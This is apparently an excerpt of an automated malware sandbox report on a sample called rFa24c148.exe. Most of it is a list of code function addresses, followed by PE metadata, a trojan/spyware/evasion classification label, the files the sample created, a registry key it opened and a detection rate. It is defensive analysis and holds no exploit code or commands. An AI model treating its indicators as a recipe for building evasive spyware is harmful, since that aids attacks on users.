Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367415E8 4_2_367415E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674E9D8 4_2_3674E9D8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36745BD8 4_2_36745BD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674C9D8 4_2_3674C9D8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674E9C8 4_2_3674E9C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36745BCA 4_2_36745BCA
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36742BB0 4_2_36742BB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367411A0 4_2_367411A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36742BA0 4_2_36742BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36748FA1 4_2_36748FA1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36742BAF 4_2_36742BAF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674B7A8 4_2_3674B7A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674D798 4_2_3674D798
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674B798 4_2_3674B798
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674D787 4_2_3674D787
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36745780 4_2_36745780
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_3674F788 4_2_3674F788
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6678 4_2_367B6678
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B3FE8 4_2_367B3FE8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4478 4_2_367B4478
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2478 4_2_367B2478
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BBC78 4_2_367BBC78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BE77F 4_2_367BE77F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9171 4_2_367B9171
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BD470 4_2_367BD470
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1270 4_2_367B1270
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BA968 4_2_367BA968
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4468 4_2_367B4468
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6568 4_2_367B6568
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0960 4_2_367B0960
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7E60 4_2_367B7E60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BD460 4_2_367BD460
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B3B58 4_2_367B3B58
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BEC58 4_2_367BEC58
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BA958 4_2_367BA958
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BC150 4_2_367BC150
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0950 4_2_367B0950
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7E50 4_2_367B7E50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5B48 4_2_367B5B48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9648 4_2_367B9648
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B3B4F 4_2_367B3B4F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BEC4D 4_2_367BEC4D
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BC143 4_2_367BC143
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0040 4_2_367B0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6B40 4_2_367B6B40
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5B39 4_2_367B5B39
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B3238 4_2_367B3238
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BD938 4_2_367BD938
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BAE30 4_2_367BAE30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6B30 4_2_367B6B30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9637 4_2_367B9637
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5228 4_2_367B5228
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B8328 4_2_367B8328
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B322F 4_2_367B322F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0023 4_2_367B0023
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6621 4_2_367B6621
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF120 4_2_367BF120
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BD927 4_2_367BD927
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5219 4_2_367B5219
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B8319 4_2_367B8319
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2918 4_2_367B2918
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BC618 4_2_367BC618
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BAE1F 4_2_367BAE1F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF111 4_2_367BF111
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1710 4_2_367B1710
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9B10 4_2_367B9B10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6609 4_2_367B6609
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4908 4_2_367B4908
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7008 4_2_367B7008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BC608 4_2_367BC608
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BDE00 4_2_367BDE00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2907 4_2_367B2907
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B6FFB 4_2_367B6FFB
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1FF8 4_2_367B1FF8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB2F8 4_2_367BB2F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B16FF 4_2_367B16FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9AFF 4_2_367B9AFF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0DF0 4_2_367B0DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B87F0 4_2_367B87F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BDDF0 4_2_367BDDF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B48F7 4_2_367B48F7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF5E8 4_2_367BF5E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1FE8 4_2_367B1FE8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB2E8 4_2_367BB2E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCAE0 4_2_367BCAE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B0DE0 4_2_367B0DE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B87E0 4_2_367B87E0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5FD8 4_2_367B5FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9FD8 4_2_367B9FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B3FD8 4_2_367B3FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCAD1 4_2_367BCAD1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B04D0 4_2_367B04D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B74D0 4_2_367B74D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BF5D7 4_2_367BF5D7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BE2C8 4_2_367BE2C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9FC8 4_2_367B9FC8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB7C0 4_2_367BB7C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B04C0 4_2_367B04C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B5FC7 4_2_367B5FC7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B56B8 4_2_367B56B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B8CB8 4_2_367B8CB8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BE2B8 4_2_367BE2B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B74BF 4_2_367B74BF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BFAB0 4_2_367BFAB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B8CA9 4_2_367B8CA9
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2DA8 4_2_367B2DA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCFA8 4_2_367BCFA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B56A8 4_2_367B56A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BB7AF 4_2_367BB7AF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1BA0 4_2_367B1BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BA4A0 4_2_367BA4A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BFAA0 4_2_367BFAA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BCFA7 4_2_367BCFA7
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2D9B 4_2_367B2D9B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4D98 4_2_367B4D98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7998 4_2_367B7998
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1B91 4_2_367B1B91
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BE790 4_2_367BE790
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B4D89 4_2_367B4D89
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B2488 4_2_367B2488
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BBC88 4_2_367BBC88
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B7988 4_2_367B7988
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367BA48F 4_2_367BA48F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B1280 4_2_367B1280
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367B9180 4_2_367B9180
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EEE48 4_2_367EEE48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E70C0 4_2_367E70C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED710 4_2_367ED710
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6A70 4_2_367E6A70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ECC68 4_2_367ECC68
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4E60 4_2_367E4E60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1C60 4_2_367E1C60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E9C53 4_2_367E9C53
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC249 4_2_367EC249
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6440 4_2_367E6440
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3240 4_2_367E3240
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0040 4_2_367E0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EEE3B 4_2_367EEE3B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0037 4_2_367E0037
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6430 4_2_367E6430
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB829 4_2_367EB829
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4820 4_2_367E4820
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1620 4_2_367E1620
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E8810 4_2_367E8810
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EAE09 4_2_367EAE09
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5E00 4_2_367E5E00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E2C00 4_2_367E2C00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED401 4_2_367ED401
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EA8F8 4_2_367EA8F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ECEF0 4_2_367ECEF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5AE0 4_2_367E5AE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E28E0 4_2_367E28E0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E9EDB 4_2_367E9EDB
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC4D0 4_2_367EC4D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5AD1 4_2_367E5AD1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3EC0 4_2_367E3EC0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0CC0 4_2_367E0CC0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E94BB 4_2_367E94BB
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EBAB0 4_2_367EBAB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E70AF 4_2_367E70AF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E54A0 4_2_367E54A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E22A0 4_2_367E22A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB090 4_2_367EB090
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3880 4_2_367E3880
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0680 4_2_367E0680
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6A80 4_2_367E6A80
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED179 4_2_367ED179
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6760 4_2_367E6760
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3560 4_2_367E3560
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0360 4_2_367E0360
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC759 4_2_367EC759
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0350 4_2_367E0350
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6750 4_2_367E6750
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4B40 4_2_367E4B40
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1940 4_2_367E1940
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EBD38 4_2_367EBD38
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6120 4_2_367E6120
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E2F20 4_2_367E2F20
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB318 4_2_367EB318
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E4500 4_2_367E4500
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1300 4_2_367E1300
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367ED700 4_2_367ED700
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5DF0 4_2_367E5DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E7DF0 4_2_367E7DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E41E0 4_2_367E41E0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0FE0 4_2_367E0FE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EC9E1 4_2_367EC9E1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E0FD0 4_2_367E0FD0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E41D0 4_2_367E41D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E73D0 4_2_367E73D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E99C8 4_2_367E99C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E57C0 4_2_367E57C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E25C0 4_2_367E25C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EBFC1 4_2_367EBFC1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E6DA0 4_2_367E6DA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E3BA0 4_2_367E3BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E09A0 4_2_367E09A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EB5A1 4_2_367EB5A1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E5180 4_2_367E5180
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367E1F80 4_2_367E1F80
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367EAB80 4_2_367EAB80
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8470 4_2_367F8470
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1CF0 4_2_367F1CF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FFB30 4_2_367FFB30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE870 4_2_367FE870
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB670 4_2_367FB670
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE861 4_2_367FE861
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9A50 4_2_367F9A50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FCC50 4_2_367FCC50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FCC41 4_2_367FCC41
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0040 4_2_367F0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB030 4_2_367FB030
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE230 4_2_367FE230
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1828 4_2_367F1828
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE221 4_2_367FE221
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1817 4_2_367F1817
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0013 4_2_367F0013
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FC610 4_2_367FC610
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9410 4_2_367F9410
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FF810 4_2_367FF810
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9400 4_2_367F9400
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F04FF 4_2_367F04FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FF4F0 4_2_367FF4F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F90F0 4_2_367F90F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FC2F0 4_2_367FC2F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1CE0 4_2_367F1CE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FD8D0 4_2_367FD8D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA6D0 4_2_367FA6D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FBCB0 4_2_367FBCB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8AB0 4_2_367F8AB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FEEB0 4_2_367FEEB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8A9F 4_2_367F8A9F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0E98 4_2_367F0E98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA090 4_2_367FA090
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FD290 4_2_367FD290
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0E8D 4_2_367F0E8D
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9D70 4_2_367F9D70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FCF70 4_2_367FCF70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1360 4_2_367F1360
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F1351 4_2_367F1351
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FE550 4_2_367FE550
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB350 4_2_367FB350
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FC930 4_2_367FC930
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F9730 4_2_367F9730
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FAD10 4_2_367FAD10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FDF10 4_2_367FDF10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F0508 4_2_367F0508
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FDBF0 4_2_367FDBF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA9F0 4_2_367FA9F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F35E8 4_2_367F35E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FF1D0 4_2_367FF1D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F09D0 4_2_367F09D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8DD0 4_2_367F8DD0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FBFD0 4_2_367FBFD0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F09BF 4_2_367F09BF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FD5B0 4_2_367FD5B0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FA3B0 4_2_367FA3B0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FB990 4_2_367FB990
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367F8790 4_2_367F8790
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367FEB90 4_2_367FEB90
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_368336F0 4_2_368336F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831470 4_2_36831470
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36833008 4_2_36833008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831B50 4_2_36831B50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832238 4_2_36832238
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830D88 4_2_36830D88
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832920 4_2_36832920
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_368336E1 4_2_368336E1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831460 4_2_36831460
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36833003 4_2_36833003
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36831B3F 4_2_36831B3F
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832229 4_2_36832229
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830015 4_2_36830015
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830040 4_2_36830040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830D7B 4_2_36830D7B
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830A10 4_2_36830A10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_368308DE 4_2_368308DE
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36832911 4_2_36832911
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36830960 4_2_36830960
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36922788 4_2_36922788
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36922770 4_2_36922770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36929771 4_2_36929771
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36920F74 4_2_36920F74
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: String function: 00402B3A appears 51 times
Sample file is different than original file name gathered from version info
Source: rFa24c148.exe, 00000004.00000002.2993451068.0000000033237000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rFa24c148.exe
Uses 32bit PE files
Source: rFa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00404457 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404457
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Program Files (x86)\shaw Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Mutant created: NULL
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nsgA16E.tmp Jump to behavior
Source: rFa24c148.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\rFa24c148.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: rFa24c148.exe ReversingLabs: Detection: 15%
